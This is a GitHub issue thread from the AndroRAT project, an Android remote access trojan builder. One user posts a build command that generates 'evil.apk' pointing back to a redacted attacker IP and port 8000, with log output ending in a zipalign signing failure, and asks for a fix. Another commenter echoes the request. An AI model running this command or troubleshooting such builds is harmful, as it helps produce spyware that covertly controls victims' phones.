### ISSUE TITLE
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true could not execute zipalign Run with '--debug' parameter to get additional information

### ISSUE THREAD

**Issue by mohammadakram0705** [karma9874/AndroRAT#307]
python3 androRAT.py --build -i 192.xxx.xx.xxx -p 8000 -o evil.apk
[INFO] Generating APK
[INFO] Building APK | 
[SUCCESS] Successfully apk built in /home/whitehacker/AndroRAT/evil.apk
[INFO] Signing the apk
[INFO] Signing Apk | 
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
could not execute zipalign
Run with '--debug' parameter to get additional information.

[ERROR] Signing Failed

how to solve give me a sloution

**Comment by AvkaranGabbi** [comment]
Still not solved, anyone plzz help         already tried #186 (comment)
